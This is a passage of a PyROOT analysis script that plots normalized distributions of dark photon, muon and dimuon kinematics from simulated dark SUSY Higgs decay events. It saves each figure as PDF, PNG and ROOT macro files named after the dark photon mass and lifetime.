legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_XY_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_XY_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.C")
h_gammaD_1_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_Z_lab)
h_gammaD_1_cT_Z_lab.Scale(1/normConstant)
h_gammaD_1_cT_Z_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_Z_lab)
h_gammaD_2_cT_Z_lab.Scale(1/normConstant2)
h_gammaD_2_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_Z_lab,h_gammaD_1_cT_Z_lab_dummy)
#h_gammaD_1_cT_Z_lab.DrawNormalized("same")
#h_gammaD_2_cT_Z_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_Z_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_Z_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.C")
h_gammaD_1_pT_dummy.Draw()
h_gammaD_1_pT.DrawNormalized("same")
h_gammaD_2_pT.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pT,h_gammaD_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.C")
h_gammaD_1_pZ_dummy.Draw()
#plotOverflow(h_gammaD_1_pZ)
#plotOverflow(h_gammaD_2_pZ)
h_gammaD_1_pZ.DrawNormalized("same")
h_gammaD_2_pZ.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pZ,h_gammaD_1_pZ_dummy)
#htmp = ROOT.TH1F(h_gammaD_1_pZ.GetName(),h_gammaD_1_pZ.GetTitle(), h_gammaD_1_pZ.GetNbinsX()+1, h_gammaD_1_pZ.GetBinLowEdge(1), h_gammaD_1_pZ.GetBinLowEdge(h_gammaD_1_pZ.GetNbinsX()+1)+h_gammaD_1_pZ.GetBinWidth(h_gammaD_1_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_1_pZ.GetNbinsX()+1 ):
# htmp.Fill(htmp.GetBinCenter(i), h_gammaD_1_pZ.GetBinContent(i))
#htmp.Fill(h_gammaD_1_pZ.GetNbinsX()-1, h_gammaD_1_pZ.GetBinContent(0))
#htmp.SetEntries(h_gammaD_1_pZ.GetEntries())
#htmp.SetLineColor(ROOT.kRed)
#htmp.DrawNormalized("same")
#htmp2 = ROOT.TH1F(h_gammaD_2_pZ.GetName(), h_gammaD_2_pZ.GetTitle(), h_gammaD_2_pZ.GetNbinsX()+1, h_gammaD_2_pZ.GetBinLowEdge(1), h_gammaD_2_pZ.GetBinLowEdge(h_gammaD_2_pZ.GetNbinsX()+1)+h_gammaD_2_pZ.GetBinWidth(h_gammaD_2_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_2_pZ.GetNbinsX()+1 ):
# htmp2.Fill(htmp2.GetBinCenter(i), h_gammaD_2_pZ.GetBinContent(i))
#htmp2.Fill(h_gammaD_2_pZ.GetNbinsX()-1, h_gammaD_2_pZ.GetBinContent(0))
#htmp2.SetEntries(h_gammaD_2_pZ.GetEntries())
#htmp2.SetLineColor(ROOT.kBlue)
#htmp2.DrawNormalized("same")
#h_gammaD_1_pZ.DrawNormalized("same")
#h_gammaD_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pZ,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pZ,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.C")
h_gammaD_1_Eta_dummy.Draw()
h_gammaD_1_Eta.DrawNormalized("same")
h_gammaD_2_Eta.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Eta,h_gammaD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Eta,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Eta,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.C")
h_gammaD_1_Phi_dummy.Draw()
h_gammaD_1_Phi.DrawNormalized("same")
h_gammaD_2_Phi.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Phi,h_gammaD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Phi,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Phi,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.C")
h_gammaD_1_p_dummy.Draw()
plotOverflow(h_gammaD_1_p)
plotOverflow(h_gammaD_2_p)
scaleAxisY(h_gammaD_2_p,h_gammaD_1_p_dummy)
#h_gammaD_1_p.DrawNormalized("same")
#h_gammaD_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_p,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_p,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.C")
h_gammaD_1_M_dummy.Draw()
cnv.SetLogx()
h_gammaD_1_M.DrawNormalized("same")
#h_gammaD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_gammaD_1_M,"1st dark photon (leading p_{T})","L")
#legend.AddEntry(h_gammaD_2_M,"2nd dark photon","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.C")
cnv.SetLogx(0)
h_muon_pT_dummy.Draw()
h_muon_pT_0.DrawNormalized("same")
h_muon_pT_1.DrawNormalized("same")
h_muon_pT_2.DrawNormalized("same")
h_muon_pT_3.DrawNormalized("same")
scaleAxisY(h_muon_pT_3,h_muon_pT_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pT_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pT_1,"2nd muon","L")
legend.AddEntry(h_muon_pT_2,"3rd muon","L")
legend.AddEntry(h_muon_pT_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.C")
h_muon_phi_dummy.Draw()
h_muon_phi_0.DrawNormalized("same")
h_muon_phi_1.DrawNormalized("same")
h_muon_phi_2.DrawNormalized("same")
h_muon_phi_3.DrawNormalized("same")
scaleAxisY(h_muon_phi_0,h_muon_phi_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_phi_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_phi_1,"2nd muon","L")
legend.AddEntry(h_muon_phi_2,"3rd muon","L")
legend.AddEntry(h_muon_phi_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.C")
h_muon_pZ_dummy.Draw()
h_muon_pZ_0.DrawNormalized("same")
h_muon_pZ_1.DrawNormalized("same")
h_muon_pZ_2.DrawNormalized("same")
h_muon_pZ_3.DrawNormalized("same")
scaleAxisY(h_muon_pZ_3,h_muon_pZ_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pZ_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pZ_1,"2nd muon","L")
legend.AddEntry(h_muon_pZ_2,"3rd muon","L")
legend.AddEntry(h_muon_pZ_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.C")
h_muon_p_dummy.Draw()
h_muon_p_0.DrawNormalized("same")
h_muon_p_1.DrawNormalized("same")
h_muon_p_2.DrawNormalized("same")
h_muon_p_3.DrawNormalized("same")
scaleAxisY(h_muon_p_3,h_muon_p_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_p_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_p_1,"2nd muon","L")
legend.AddEntry(h_muon_p_2,"3rd muon","L")
legend.AddEntry(h_muon_p_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.C")
h_muon_eta_dummy.Draw()
h_muon_eta_0.DrawNormalized("same")
h_muon_eta_1.DrawNormalized("same")
h_muon_eta_2.DrawNormalized("same")
h_muon_eta_3.DrawNormalized("same")
scaleAxisY(h_muon_eta_0,h_muon_eta_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_eta_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_eta_1,"2nd muon","L")
legend.AddEntry(h_muon_eta_2,"3rd muon","L")
legend.AddEntry(h_muon_eta_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.C")
#h_dimuon_m_dummy.Draw()
#h_dimuon_m_0.DrawNormalized("same")
#h_dimuon_m_1.DrawNormalized("same")
#h_dimuon_m_2.DrawNormalized("same")
#h_dimuon_m_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
## convert -define.pdf:use-cropbox=true -density 300 CSxBR_vs_mh.pdf -resize 900x900 CSxBR_vs_mh.png
#
#h_dimuon_m_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_log_0.DrawNormalized("same")
#h_dimuon_m_log_1.DrawNormalized("same")
#h_dimuon_m_log_2.DrawNormalized("same")
#h_dimuon_m_log_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_log_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_log_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.png")
#cnv.SetLogy(0)
#
#h_dimuon_m_real_fake_dummy.Draw()
#h_dimuon_m_real_fake_0.DrawNormalized("same")
#h_dimuon_m_real_fake_1.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.png")
#
#h_dimuon_m_real_fake_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_real_fake_log_0.DrawNormalized("same")
#h_dimuon_m_real_fake_log_1.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_log_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_log_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.png")
cnv.SetLogy(0)
h_m1_vs_m2.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.C")
cnv.SetLogx()
h_m2.Draw()
h_m1.Draw("same")
info.Draw()
txtHeader.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.C")
cnv.SetLogx(0)
h_dimuon_m_fake_dummy.Draw()
h_dimuon_m_fake_0.DrawNormalized("same")
scaleAxisY(h_dimuon_m_fake_0,h_dimuon_m_fake_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.C")
h_dimuon_m_fake_log_dummy.Draw()
cnv.SetLogy()
cnv.SetLogx()
h_dimuon_m_fake_log_0.DrawNormalized("same")
#scaleAxisY(h_dimuon_m_fake_log_0,h_dimuon_m_fake_log_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.C")
cnv.SetLogy(0)
cnv.SetLogx(0)
h_dimuon_1_pT_dummy.Draw()
h_dimuon_1_pT.DrawNormalized("same")
h_dimuon_2_pT.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pT,h_dimuon_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pT,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pT,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.C")
h_dimuon_1_pZ_dummy.Draw()
#plotOverflow(h_dimuon_1_pZ)
#plotOverflow(h_dimuon_2_pZ)
h_dimuon_1_pZ.DrawNormalized("same")
h_dimuon_2_pZ.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pZ,h_dimuon_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pZ,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pZ,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.C")
h_dimuon_1_Eta_dummy.Draw()
h_dimuon_1_Eta.DrawNormalized("same")
h_dimuon_2_Eta.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Eta,h_dimuon_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Eta,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Eta,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.C")
h_dimuon_1_Phi_dummy.Draw()
h_dimuon_1_Phi.DrawNormalized("same")
h_dimuon_2_Phi.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Phi,h_dimuon_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Phi,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Phi,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.C")
h_dimuon_1_p_dummy.Draw()
plotOverflow(h_dimuon_1_p)
plotOverflow(h_dimuon_2_p)
scaleAxisY(h_dimuon_2_p,h_dimuon_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_p,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_p,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.C")
BAM.Write()
